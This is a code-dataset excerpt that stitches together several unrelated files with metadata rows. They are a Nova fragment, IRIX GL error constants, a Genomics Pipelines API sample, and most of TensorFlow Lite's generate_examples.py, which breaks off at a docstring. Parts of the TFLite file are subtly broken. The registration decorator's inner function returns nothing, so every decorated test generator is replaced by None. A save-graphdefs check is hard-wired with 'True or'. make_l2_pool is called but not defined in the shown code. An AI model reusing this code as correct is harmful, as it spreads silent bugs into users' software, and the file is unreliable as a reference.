cyclient.delete_arqs_for_instance(instance.uuid)
except exception.AcceleratorRequestOpFailed as e:
LOG.exception('Failed to delete accelerator requests for '
'instance %s. Exception: %s', instance.uuid, e)
if arq_uuids:
LOG.debug('Calling Cyborg to delete ARQs by uuids %(uuid)s for'
' instance %(instance)s',
{'instance': instance.uuid,
'uuid': arq_uuids})
cyclient.delete_arqs_by_uuid(arq_uuids)
|
openstack/nova
|
nova/compute/utils.py
|
Python
|
apache-2.0
| 63,683 | 0.000094 |
NOERROR = 0
NOCONTEXT = -1
NODISPLAY = -2
NOWINDOW = -3
NOGRAPHICS = -4
NOTTOP = -5
NOVISUAL = -6
BUFSIZE = -7
BADWINDOW = -8
ALREADYBOUND = -100
BINDFAILED = -101
SETFAILED = -102
|
xbmc/atv2
|
xbmc/lib/libPython/Python/Lib/plat-irix6/GLWS.py
|
Python
|
gpl-2.0
| 181 | 0 |
#!/usr/bin/python
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""Python sample demonstrating use of the Google Genomics Pipelines API.
This sample demonstrates a pipeline that uses Bioconductor to analyze
files in Google Cloud Storage.
This pipeline is run in an "ephemeral" manner; no call to pipelines.create()
is necessary. No pipeline is persisted in the pipelines list.
"""
import pprint
import time
from oauth2client.client import GoogleCredentials
from apiclient.discovery import build
PROJECT_ID='**FILL IN PROJECT ID**'
BUCKET='**FILL IN BUCKET**'
# Output will be written underneath gs://<BUCKET>/<PREFIX>/
PREFIX='pipelines-api-examples/bioconductor'
# Update this path if you uploaded the script elsewhere in Cloud Storage.
SCRIPT='gs://%s/%s/script.R' % (BUCKET, PREFIX)
# This script will poll for completion of the pipeline.
POLL_INTERVAL_SECONDS = 20
# Create the genomics service.
credentials = GoogleCredentials.get_application_default()
service = build('genomics', 'v1alpha2', credentials=credentials)
# Run the pipeline.
operation = service.pipelines().run(body={
# The ephemeralPipeline provides the template for the pipeline.
# The pipelineArgs provide the inputs specific to this run.
'ephemeralPipeline' : {
'projectId': PROJECT_ID,
'name': 'Bioconductor: count overlaps in a BAM',
'description': 'This sample demonstrates a subset of the vignette https://bioconductor.org/packages/release/bioc/vignettes/BiocParallel/inst/doc/Introduction_To_BiocParallel.pdf.',
# Define the resources needed for this pipeline.
'resources' : {
# Specify default VM parameters for the pipeline.
'minimumCpuCores': 1, # TODO: remove this when the API has a default.
'minimumRamGb': 3.75, # TODO: remove this when the API has a default.
# Create a data disk that is attached to the VM and destroyed when the
# pipeline terminates.
'disks': [ {
'name': 'data',
'autoDelete': True,
# Within the docker container, specify a mount point for the disk.
# The pipeline input argument below will specify that inputs should be
# written to this disk.
'mountPoint': '/mnt/data',
# Specify a default size and type.
'sizeGb': 100, # TODO: remove this when the API has a default
'type': 'PERSISTENT_HDD', # TODO: remove this when the API has a default
} ],
},
# Specify the docker image to use along with the command. See
# http://www.bioconductor.org/help/docker/ for more detail.
'docker' : {
'imageName': 'bioconductor/release_core',
# Change into the directory in which the script and input reside. Then
# run the R script in batch mode to completion.
'cmd': '/bin/bash -c "cd /mnt/data/ ; R CMD BATCH script.R"',
},
'inputParameters' : [ {
'name': 'script',
'description': 'Cloud Storage path to the R script to run.',
'localCopy': {
'path': 'script.R',
'disk': 'data'
}
}, {
'name': 'bamFile',
'description': 'Cloud Storage path to the BAM file.',
'localCopy': {
'path': 'input.bam',
'disk': 'data'
}
}, {
'name': 'indexFile',
'description': 'Cloud Storage path to the BAM index file.',
'localCopy': {
'path': 'input.bam.bai',
'disk': 'data'
}
} ],
'outputParameters' : [ {
'name': 'outputFile',
'description': 'Cloud Storage path for where to write the result.',
'localCopy': {
'path': 'overlapsCount.tsv',
'disk': 'data'
}
}, {
'name': 'rBatchLogFile',
'description': 'Cloud Storage path for where to write the R batch log file.',
'localCopy': {
'path': 'script.Rout',
'disk': 'data'
}
} ]
},
'pipelineArgs' : {
'projectId': PROJECT_ID,
# Here we use a very tiny BAM as an example but this pipeline could be invoked in
# a loop to kick off parallel execution of this pipeline on, for example, all the
# 1000 Genomes phase 3 BAMs in
# gs://genomics-public-data/ftp-trace.ncbi.nih.gov/1000genomes/ftp/phase3/data/*/alignment/*.mapped.ILLUMINA.bwa.*.low_coverage.20120522.bam'
# emitting a distinct output file for each result. Then you can:
# gsutil cat gs://<BUCKET>/<PREFIX>/output/*tsv > allOverlapsCount.tsv
# to create the final consolidated TSV file.
'inputs': {
'script': SCRIPT,
'bamFile': 'gs://genomics-public-data/ftp-trace.ncbi.nih.gov/1000genomes/ftp/technical/pilot3_exon_targetted_GRCh37_bams/data/NA06986/alignment/NA06986.chromMT.ILLUMINA.bwa.CEU.exon_targetted.20100311.bam',
'indexFile': 'gs://genomics-public-data/ftp-trace.ncbi.nih.gov/1000genomes/ftp/technical/pilot3_exon_targetted_GRCh37_bams/data/NA06986/alignment/NA06986.chromMT.ILLUMINA.bwa.CEU.exon_targetted.20100311.bam.bai'
},
# Pass the user-specified Cloud Storage destination for pipeline output.
'outputs': {
# The R script explicitly writes out one file of results.
'outputFile': 'gs://%s/%s/output/overlapsCount.tsv' % (BUCKET, PREFIX),
# R, when run in batch mode, writes console output to a file.
'rBatchLogFile': 'gs://%s/%s/output/script.Rout' % (BUCKET, PREFIX)
},
# Pass the user-specified Cloud Storage destination for pipeline logging.
'logging': {
'gcsPath': 'gs://%s/%s/logging' % (BUCKET, PREFIX)
},
# TODO: remove this when the API has a default
'serviceAccount': {
'email': 'default',
'scopes': [
'https://www.googleapis.com/auth/compute',
'https://www.googleapis.com/auth/devstorage.full_control',
'https://www.googleapis.com/auth/genomics'
]
}
}
}).execute()
# Emit the result of the pipeline run submission and poll for completion.
pp = pprint.PrettyPrinter(indent=2)
pp.pprint(operation)
operation_name = operation['name']
print
print "Polling for completion of operation"
while not operation['done']:
print "Operation not complete. Sleeping %d seconds" % (POLL_INTERVAL_SECONDS)
time.sleep(POLL_INTERVAL_SECONDS)
operation = service.operations().get(name=operation_name).execute()
print
print "Operation complete"
print
pp.pprint(operation)
|
googlegenomics/pipelines-api-examples
|
bioconductor/run_bioconductor.py
|
Python
|
bsd-3-clause
| 6,448 | 0.004498 |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generate a series of TensorFlow graphs that become tflite test cases.
Usage:
generate_examples <output directory>
bazel run //tensorflow/lite/testing:generate_examples
To more easily debug failures use (or override) the --save_graphdefs flag to
place text proto graphdefs into the generated zip files.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import operator
import os
import random
import re
import string
import tempfile
import traceback
import zipfile
import numpy as np
from six import StringIO
from six.moves import xrange
# TODO(aselle): Disable GPU for now
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# pylint: disable=g-import-not-at-top
import tensorflow as tf
from google.protobuf import text_format
# TODO(aselle): switch to TensorFlow's resource_loader
from tensorflow.lite.testing import generate_examples_report as report_lib
from tensorflow.lite.testing import string_util_wrapper
from tensorflow.python.framework import test_util
from tensorflow.python.framework import graph_util as tf_graph_util
from tensorflow.python.ops import rnn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import spectral_ops_test_util
RANDOM_SEED = 342
TEST_INPUT_DEPTH = 3
# A map from regular expression to bug number. Any test failure with label
# matching the expression will be considered due to the corresponding bug.
KNOWN_BUGS = {
# TOCO doesn't support scalars as input.
# Concat doesn't work with a single input tensor
r"concat.*num_tensors=1": "67378344",
# Transposition in MatMul is not fully supported.
"fully_connected.*transpose_a=True": "67586970",
# Softmax graphs are too complex.
r"softmax.*dim=0": "67749831",
# BatchToSpaceND only supports 4D tensors.
r"batch_to_space_nd.*input_shape=\[8,2,2,2,1,1\]": "70594733",
# Div will use floordiv.
r"div.*int32": "72051395",
}
class Options(object):
"""All options for example generation."""
def __init__(self):
# Directory where the outputs will be go.
self.output_path = None
# Particular zip to output.
self.zip_to_output = None
# Path to toco tool.
self.toco = None
# If a particular model is affected by a known bug count it as a Toco
# error.
self.known_bugs_are_errors = False
# Raise an exception if any converter error is encountered.
self.ignore_converter_errors = False
# Include intermediate graphdefs in the output zip files.
self.save_graphdefs = False
# Whether the TFLite Flex converter is being used.
self.run_with_flex = False
# The function to convert a TensorFLow model to TFLite model.
# See the document for `toco_convert` function for its required signature.
# TODO(ycling): Decouple `toco_convert` function from this module, and
# remove the `toco` attribute in this class.
self.tflite_convert_function = toco_convert
# A map from regular expression to bug number. Any test failure with label
# matching the expression will be considered due to the corresponding bug.
self.known_bugs = KNOWN_BUGS
# A map from names to functions which make test cases.
_MAKE_TEST_FUNCTIONS_MAP = {}
# A decorator to register the make test functions.
# Usage:
# All the make_*_test should be registered. Example:
# @register_make_test_function()
# def make_conv_tests(options):
# # ...
# If a function is decorated by other decorators, it's required to specify the
# name explicitly. Example:
# @register_make_test_function(name="make_unidirectional_sequence_lstm_tests")
# @test_util.enable_control_flow_v2
# def make_unidirectional_sequence_lstm_tests(options):
# # ...
def register_make_test_function(name=None):
def decorate(function, name=name):
if name is None:
name = function.__name__
_MAKE_TEST_FUNCTIONS_MAP[name] = function
return decorate
class ExtraTocoOptions(object):
"""Additional toco options besides input, output, shape."""
def __init__(self):
# Whether to ignore control dependency nodes.
self.drop_control_dependency = False
# Allow custom ops in the toco conversion.
self.allow_custom_ops = False
# Rnn states that are used to support rnn / lstm cells.
self.rnn_states = None
    # Split the LSTM inputs from 5 inputs to 18 inputs for TFLite.
self.split_tflite_lstm_inputs = None
def toco_options(data_types,
input_arrays,
output_arrays,
shapes,
extra_toco_options=ExtraTocoOptions()):
"""Create TOCO options to process a model.
Args:
data_types: input and inference types used by TOCO.
input_arrays: names of the input tensors
output_arrays: name of the output tensors
shapes: shapes of the input tensors
extra_toco_options: additional toco options
Returns:
the options in a string.
"""
shape_str = ":".join([",".join(str(y) for y in x) for x in shapes if x])
inference_type = "FLOAT"
# TODO(ahentz): if we get multi-input quantization to work we need this
# to change
if data_types[0] == "QUANTIZED_UINT8":
inference_type = "QUANTIZED_UINT8"
s = (" --input_data_types=%s" % ",".join(data_types) +
" --inference_type=%s" % inference_type +
" --input_format=TENSORFLOW_GRAPHDEF" + " --output_format=TFLITE" +
" --input_arrays=%s" % ",".join(input_arrays) +
" --output_arrays=%s" % ",".join(output_arrays))
if shape_str:
s += (" --input_shapes=%s" % shape_str)
if extra_toco_options.drop_control_dependency:
s += " --drop_control_dependency"
if extra_toco_options.allow_custom_ops:
s += " --allow_custom_ops"
if extra_toco_options.rnn_states:
s += (" --rnn_states='" + extra_toco_options.rnn_states + "'")
if extra_toco_options.split_tflite_lstm_inputs is not None:
if extra_toco_options.split_tflite_lstm_inputs:
s += " --split_tflite_lstm_inputs=true"
else:
s += " --split_tflite_lstm_inputs=false"
return s
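# NOTE: illustrative sketch only, not part of this file. With a single float
# input the generated flag string contains the pieces asserted below; the
# tensor names and shape are made up for demonstration.
_example_toco_flags = toco_options(
    data_types=["FLOAT"],
    input_arrays=["input"],
    output_arrays=["output"],
    shapes=[[1, 224, 224, 3]])
assert "--inference_type=FLOAT" in _example_toco_flags
assert "--input_shapes=1,224,224,3" in _example_toco_flags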
def format_result(t):
"""Convert a tensor to a format that can be used in test specs."""
if t.dtype.kind not in [np.dtype(np.string_).kind, np.dtype(np.object_).kind]:
# Output 9 digits after the point to ensure the precision is good enough.
values = ["{:.9f}".format(value) for value in list(t.flatten())]
return ",".join(values)
else:
return string_util_wrapper.SerializeAsHexString(t.flatten())
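# NOTE: illustrative sketch only, not part of this file: numeric tensors are
# rendered as comma-separated values with 9 digits after the decimal point.
assert format_result(np.array([1.0, 2.5], dtype=np.float32)) == (
    "1.000000000,2.500000000")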
def write_examples(fp, examples):
"""Given a list `examples`, write a text format representation.
  The file format is csv-like with a simple repeated pattern. We would like
  to use proto here, but we can't yet due to interfacing with the Android
  team using this format.
Args:
fp: File-like object to write to.
    examples: Example dictionary consisting of keys "inputs" and "outputs"
"""
def write_tensor(fp, x):
"""Write tensor in file format supported by TFLITE example."""
fp.write("dtype,%s\n" % x.dtype)
fp.write("shape," + ",".join(map(str, x.shape)) + "\n")
fp.write("values," + format_result(x) + "\n")
fp.write("test_cases,%d\n" % len(examples))
for example in examples:
fp.write("inputs,%d\n" % len(example["inputs"]))
for i in example["inputs"]:
write_tensor(fp, i)
fp.write("outputs,%d\n" % len(example["outputs"]))
for i in example["outputs"]:
write_tensor(fp, i)
def write_test_cases(fp, model_name, examples):
"""Given a dictionary of `examples`, write a text format representation.
The file format is protocol-buffer-like, even though we don't use proto due
to the needs of the Android team.
Args:
fp: File-like object to write to.
model_name: Filename where the model was written to, relative to filename.
    examples: Example dictionary consisting of keys "inputs" and "outputs"
"""
fp.write("load_model: %s\n" % os.path.basename(model_name))
for example in examples:
fp.write("reshape {\n")
for t in example["inputs"]:
fp.write(" input: \"" + ",".join(map(str, t.shape)) + "\"\n")
fp.write("}\n")
fp.write("invoke {\n")
for t in example["inputs"]:
fp.write(" input: \"" + format_result(t) + "\"\n")
for t in example["outputs"]:
fp.write(" output: \"" + format_result(t) + "\"\n")
fp.write(" output_shape: \"" + ",".join([str(dim) for dim in t.shape]) +
"\"\n")
fp.write("}\n")
_TF_TYPE_INFO = {
tf.float32: (np.float32, "FLOAT"),
tf.float16: (np.float16, "FLOAT"),
tf.int32: (np.int32, "INT32"),
tf.uint8: (np.uint8, "QUANTIZED_UINT8"),
tf.int16: (np.int16, "QUANTIZED_INT16"),
tf.int64: (np.int64, "INT64"),
tf.bool: (np.bool, "BOOL"),
tf.string: (np.string_, "STRING"),
}
def create_tensor_data(dtype, shape, min_value=-100, max_value=100):
"""Build tensor data spreading the range [min_value, max_value)."""
if dtype in _TF_TYPE_INFO:
dtype = _TF_TYPE_INFO[dtype][0]
if dtype in (tf.float32, tf.float16):
value = (max_value-min_value)*np.random.random_sample(shape)+min_value
elif dtype in (tf.int32, tf.uint8, tf.int64, tf.int16):
value = np.random.randint(min_value, max_value+1, shape)
elif dtype == tf.bool:
value = np.random.choice([True, False], size=shape)
elif dtype == np.string_:
# Not the best strings, but they will do for some basic testing.
letters = list(string.ascii_uppercase)
return np.random.choice(letters, size=shape).astype(dtype)
return np.dtype(dtype).type(value) if np.isscalar(value) else value.astype(
dtype)
def create_scalar_data(dtype, min_value=-100, max_value=100):
"""Build scalar tensor data range from min_value to max_value exclusively."""
if dtype in _TF_TYPE_INFO:
dtype = _TF_TYPE_INFO[dtype][0]
if dtype in (tf.float32, tf.float16):
value = (max_value - min_value) * np.random.random() + min_value
elif dtype in (tf.int32, tf.uint8, tf.int64, tf.int16):
value = np.random.randint(min_value, max_value + 1)
return np.array(value, dtype=dtype)
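# NOTE: illustrative sketch only, not part of this file. Both helpers accept
# a tf dtype and return numpy data in the mapped numpy dtype; the shape and
# bounds below are arbitrary.
_example_data = create_tensor_data(tf.int32, [2, 3], min_value=0, max_value=5)
assert _example_data.shape == (2, 3)
assert _example_data.dtype == np.int32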
def freeze_graph(session, outputs):
"""Freeze the current graph.
Args:
session: Tensorflow sessions containing the graph
outputs: List of output tensors
Returns:
The frozen graph_def.
"""
return tf_graph_util.convert_variables_to_constants(
session, session.graph.as_graph_def(), [x.op.name for x in outputs])
@register_make_test_function()
def make_control_dep_tests(options):
"""Make a set of tests that use control dependencies."""
test_parameters = [{
"input_shape": [[], [1, 1, 1, 1], [1, 15, 14, 1], [3, 15, 14, 3]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
filter_value = tf.zeros((3, 3, TEST_INPUT_DEPTH, 8), tf.float32)
assert_op = tf.assert_greater_equal(input_tensor, input_tensor - 1)
with tf.control_dependencies([assert_op]):
out = tf.nn.conv2d(input_tensor, filter_value,
strides=(1, 1, 1, 1), padding="SAME")
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(tf.float32, parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
extra_toco_options = ExtraTocoOptions()
extra_toco_options.drop_control_dependency = True
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
extra_toco_options,
expected_tf_failures=3)
def toco_convert(options, graph_def, input_tensors, output_tensors, **kwargs):
"""Convert a model's graph def into a tflite model.
  NOTE: this currently shells out to the toco binary, but we would like to
  convert to Python API tooling in the future.
Args:
options: An Options instance.
graph_def: A GraphDef object.
input_tensors: List of input tensor tuples `(name, shape, type)`.
output_tensors: List of output tensors (names).
**kwargs: Extra options to be passed.
Returns:
output tflite model, log_txt from conversion
or None, log_txt if it did not convert properly.
"""
# Convert ophint ops if presented.
graph_def = tf.lite.experimental.convert_op_hints_to_stubs(
graph_def=graph_def)
graph_def_str = graph_def.SerializeToString()
extra_toco_options = kwargs.get("extra_toco_options", ExtraTocoOptions())
test_params = kwargs.get("test_params", {})
input_arrays = [x[0] for x in input_tensors]
data_types = [_TF_TYPE_INFO[x[2]][1] for x in input_tensors]
if test_params.get("fully_quantize", False):
with tempfile.NamedTemporaryFile() as graphdef_file:
graphdef_file.write(graph_def_str)
graphdef_file.flush()
input_shapes = get_input_shapes_map(input_tensors)
converter = tf.lite.TocoConverter.from_frozen_graph(
graphdef_file.name, input_arrays, output_tensors, input_shapes)
def representative_dataset(input_tensors):
calibration_inputs = []
for _, shape, _ in input_tensors:
if shape:
dims = [dim.value for dim in shape.dims]
calibration_inputs.append(
np.random.uniform(-1, 1, tuple(dims)).astype(np.float32))
return calibration_inputs
def representative_dataset_gen():
for _ in range(100):
yield representative_dataset(input_tensors)
converter.target_spec.supported_ops = [
tf.lite.OpsSet.TFLITE_BUILTINS_INT8
]
converter.representative_dataset = representative_dataset_gen
try:
tflite_model = converter.convert()
return tflite_model, ""
except Exception as e:
log = "{0}\n{1}".format(str(e), traceback.format_exc())
return None, log
  else:
    # The conversion binary path is taken from the test options.
    bin_path = options.toco
    opts = toco_options(
data_types=data_types,
input_arrays=input_arrays,
shapes=[x[1] for x in input_tensors],
output_arrays=output_tensors,
extra_toco_options=extra_toco_options)
with tempfile.NamedTemporaryFile() as graphdef_file, \
tempfile.NamedTemporaryFile() as output_file, \
tempfile.NamedTemporaryFile("w+") as stdout_file:
graphdef_file.write(graph_def_str)
graphdef_file.flush()
# TODO(aselle): Switch this to subprocess at some point.
if "pb2lite" in bin_path and options.run_with_flex:
opts = ("--input_arrays={0} --output_arrays={1}".format(
",".join(input_arrays), ",".join(output_tensors)))
elif options.run_with_flex:
opts += " --enable_select_tf_ops --force_select_tf_ops"
cmd = ("%s --input_file=%s --output_file=%s %s > %s 2>&1" %
(bin_path, graphdef_file.name, output_file.name, opts,
stdout_file.name))
exit_code = os.system(cmd)
log = (
cmd + "exited with code %d" % exit_code + "\n------------------\n" +
stdout_file.read())
return (None if exit_code != 0 else output_file.read()), log
def get_input_shapes_map(input_tensors):
"""Gets a map of input names to shapes.
Args:
input_tensors: List of input tensor tuples `(name, shape, type)`.
Returns:
{string : list of integers}.
"""
input_arrays = [tensor[0] for tensor in input_tensors]
input_shapes_list = []
for _, shape, _ in input_tensors:
dims = None
if shape:
dims = [dim.value for dim in shape.dims]
input_shapes_list.append(dims)
input_shapes = {
name: shape
for name, shape in zip(input_arrays, input_shapes_list)
if shape
}
return input_shapes
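# NOTE: illustrative sketch only, not part of this file. The tensor name and
# shape are made up; only the (name, shape, type) tuple structure matters.
assert get_input_shapes_map(
    [("input", tf.TensorShape([1, 8, 8, 3]), tf.float32)]) == {
        "input": [1, 8, 8, 3]}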
def normalize_output_name(output_name):
"""Remove :0 suffix from tensor names."""
return output_name.split(":")[0] if output_name.endswith(
":0") else output_name
# How many test cases we may have in a zip file. Too many test cases will
# slow down the test data generation process.
_MAX_TESTS_PER_ZIP = 500
def make_zip_of_tests(options,
test_parameters,
make_graph,
make_test_inputs,
extra_toco_options=ExtraTocoOptions(),
use_frozen_graph=False,
expected_tf_failures=0):
"""Helper to make a zip file of a bunch of TensorFlow models.
  This does a cartesian product of the dictionary of test_parameters and
  calls make_graph() for each item in the cartesian product set.
If the graph is built successfully, then make_test_inputs() is called to
build expected input/output value pairs. The model is then converted to tflite
with toco, and the examples are serialized with the tflite model into a zip
file (2 files per item in the cartesian product set).
Args:
options: An Options instance.
test_parameters: Dictionary mapping to lists for each parameter.
e.g. `{"strides": [[1,3,3,1], [1,2,2,1]], "foo": [1.2, 1.3]}`
make_graph: function that takes current parameters and returns tuple
`[input1, input2, ...], [output1, output2, ...]`
make_test_inputs: function taking `curr_params`, `session`, `input_tensors`,
`output_tensors` and returns tuple `(input_values, output_values)`.
extra_toco_options: Additional toco options.
use_frozen_graph: Whether or not freeze graph before toco converter.
expected_tf_failures: Number of times tensorflow is expected to fail in
      executing the input graphs. In some cases it is OK for TensorFlow to
      fail because one or more combinations of parameters are invalid.
Raises:
RuntimeError: if there are converter errors that can't be ignored.
"""
zip_path = os.path.join(options.output_path, options.zip_to_output)
parameter_count = 0
for parameters in test_parameters:
parameter_count += functools.reduce(
operator.mul, [len(values) for values in parameters.values()])
if parameter_count > _MAX_TESTS_PER_ZIP:
raise RuntimeError(
"Too many parameter combinations for generating '%s'.\n"
"There are %d combinations while the upper limit is %d.\n"
"Having too many combinations will slow down the tests.\n"
"Please consider splitting the test into multiple functions.\n"
% (zip_path, parameter_count, _MAX_TESTS_PER_ZIP))
# TODO(aselle): Make this allow multiple inputs outputs.
archive = zipfile.PyZipFile(zip_path, "w")
zip_manifest = []
convert_report = []
toco_errors = 0
processed_labels = set()
for parameters in test_parameters:
keys = parameters.keys()
for curr in itertools.product(*parameters.values()):
label = zip_path.replace(".zip", "_") + (",".join(
"%s=%r" % z for z in sorted(zip(keys, curr))).replace(" ", ""))
if label[0] == "/":
label = label[1:]
if label in processed_labels:
# Do not populate data for the same label more than once. It will cause
# errors when unzipping.
continue
processed_labels.add(label)
param_dict = dict(zip(keys, curr))
def build_example(label, param_dict_real):
"""Build the model with parameter values set in param_dict_real.
Args:
label: Label of the model (i.e. the filename in the zip).
param_dict_real: Parameter dictionary (arguments to the factories
make_graph and make_test_inputs)
Returns:
(tflite_model_binary, report) where tflite_model_binary is the
serialized flatbuffer as a string and report is a dictionary with
keys `toco_log` (log of toco conversion), `tf_log` (log of tf
conversion), `toco` (a string of success status of the conversion),
`tf` (a string success status of the conversion).
"""
np.random.seed(RANDOM_SEED)
report = {"toco": report_lib.NOTRUN, "tf": report_lib.FAILED}
# Build graph
report["tf_log"] = ""
report["toco_log"] = ""
tf.reset_default_graph()
with tf.device("/cpu:0"):
try:
inputs, outputs = make_graph(param_dict_real)
except (tf.errors.UnimplementedError, tf.errors.InvalidArgumentError,
ValueError):
report["tf_log"] += traceback.format_exc()
return None, report
sess = tf.Session()
try:
baseline_inputs, baseline_outputs = (make_test_inputs(
param_dict_real, sess, inputs, outputs))
except (tf.errors.UnimplementedError, tf.errors.InvalidArgumentError,
ValueError):
report["tf_log"] += traceback.format_exc()
return None, report
report["toco"] = report_lib.FAILED
report["tf"] = report_lib.SUCCESS
# Convert graph to toco
input_tensors = [(input_tensor.name.split(":")[0], input_tensor.shape,
input_tensor.dtype) for input_tensor in inputs]
output_tensors = [normalize_output_name(out.name) for out in outputs]
graph_def = freeze_graph(
sess,
tf.global_variables() + inputs +
outputs) if use_frozen_graph else sess.graph_def
if "split_tflite_lstm_inputs" in param_dict_real:
extra_toco_options.split_tflite_lstm_inputs = param_dict_real[
"split_tflite_lstm_inputs"]
tflite_model_binary, toco_log = options.tflite_convert_function(
options,
graph_def,
input_tensors,
output_tensors,
extra_toco_options=extra_toco_options,
test_params=param_dict_real)
report["toco"] = (report_lib.SUCCESS if tflite_model_binary is not None
else report_lib.FAILED)
report["toco_log"] = toco_log
if True or options.save_graphdefs:
archive.writestr(label + ".pbtxt",
text_format.MessageToString(graph_def),
zipfile.ZIP_DEFLATED)
if tflite_model_binary:
archive.writestr(label + ".bin", tflite_model_binary,
zipfile.ZIP_DEFLATED)
example = {"inputs": baseline_inputs, "outputs": baseline_outputs}
example_fp = StringIO()
write_examples(example_fp, [example])
archive.writestr(label + ".inputs",
example_fp.getvalue(), zipfile.ZIP_DEFLATED)
example_fp2 = StringIO()
write_test_cases(example_fp2, label + ".bin", [example])
archive.writestr(label + "_tests.txt",
example_fp2.getvalue(), zipfile.ZIP_DEFLATED)
zip_manifest.append(label + "\n")
return tflite_model_binary, report
_, report = build_example(label, param_dict)
if report["toco"] == report_lib.FAILED:
ignore_error = False
if not options.known_bugs_are_errors:
for pattern, bug_number in options.known_bugs.items():
if re.search(pattern, label):
print("Ignored converter error due to bug %s" % bug_number)
ignore_error = True
if not ignore_error:
toco_errors += 1
print("-----------------\nconverter error!\n%s\n-----------------\n" %
report["toco_log"])
convert_report.append((param_dict, report))
report_io = StringIO()
report_lib.make_report_table(report_io, zip_path, convert_report)
archive.writestr("report.html", report_io.getvalue())
archive.writestr("manifest.txt", "".join(zip_manifest), zipfile.ZIP_DEFLATED)
# Log statistics of what succeeded
total_conversions = len(convert_report)
tf_success = sum(1 for x in convert_report
if x[1]["tf"] == report_lib.SUCCESS)
toco_success = sum(1 for x in convert_report
if x[1]["toco"] == report_lib.SUCCESS)
percent = 0
if tf_success > 0:
percent = float(toco_success) / float(tf_success) * 100.
  tf.logging.info(("Archive %s Considered %d graphs, %d TF evaluated graphs "
                   "and %d TOCO converted graphs (%.1f%%)"), zip_path,
                  total_conversions, tf_success, toco_success, percent)
tf_failures = parameter_count - tf_success
if tf_failures / parameter_count > 0.8:
raise RuntimeError(("Test for '%s' is not very useful. "
"TensorFlow fails in %d percent of the cases.") %
(zip_path, int(100 * tf_failures / parameter_count)))
if tf_failures != expected_tf_failures:
raise RuntimeError(("Expected TF to fail %d times while generating '%s', "
"but that happened %d times") % (expected_tf_failures,
zip_path, tf_failures))
if not options.ignore_converter_errors and toco_errors > 0:
raise RuntimeError(
"Found %d errors while generating toco models" % toco_errors)
def make_pool_tests(pool_op_in):
"""Make a set of tests to do average pooling.
Args:
pool_op_in: TensorFlow pooling operation to test i.e. `tf.nn.avg_pool2d`.
Returns:
A function representing the true generator (after curried pool_op_in).
"""
pool_op = pool_op_in
def f(options, expected_tf_failures=0):
"""Actual function that generates examples.
Args:
options: An Options instance.
expected_tf_failures: number of expected tensorflow failures.
"""
    # Choose a set of parameters
test_parameters = [{
"ksize": [[2, 1, 1, 2], [1, 1, 1, 1], [1, 1, 2, 1], [1, 10, 11, 1]],
"strides": [[2, 1, 1, 2], [1, 1, 1, 1], [1, 1, 2, 1], [1, 10, 11, 1]],
# TODO(aselle): should add in a degenerate shape (e.g. [1, 0, 1, 1]).
"input_shape": [[], [1, 1, 1, 1], [1, 15, 14, 1], [3, 15, 14, 3]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"], # TODO(aselle): NCHW would be good
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = pool_op(
input_tensor,
ksize=parameters["ksize"],
strides=parameters["strides"],
data_format=parameters["data_format"],
padding=parameters["padding"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(tf.float32, parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
return f
@register_make_test_function()
def make_l2_pool_tests(options):
make_pool_tests(make_l2_pool)(options, expected_tf_failures=80)
@register_make_test_function()
def make_avg_pool_tests(options):
make_pool_tests(tf.nn.avg_pool)(options, expected_tf_failures=80)
@register_make_test_function()
def make_max_pool_tests(options):
make_pool_tests(tf.nn.max_pool)(options, expected_tf_failures=80)
@register_make_test_function()
def make_abs_tests(options):
"""Make a set of tests to do relu."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[], [1], [2, 3], [1, 1, 1, 1], [1, 3, 4, 3],
[3, 15, 14, 3], [3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.abs(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-10, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_elu_tests(options):
"""Make a set of tests to do (float) tf.nn.elu."""
test_parameters = [
{
"input_shape": [[], [1], [2, 3], [1, 1, 1, 1], [1, 3, 4, 3],
[3, 15, 14, 3], [3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
},
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.elu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build the inputs for the test case."""
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_identity_tests(options):
"""Make a set of tests to do identity."""
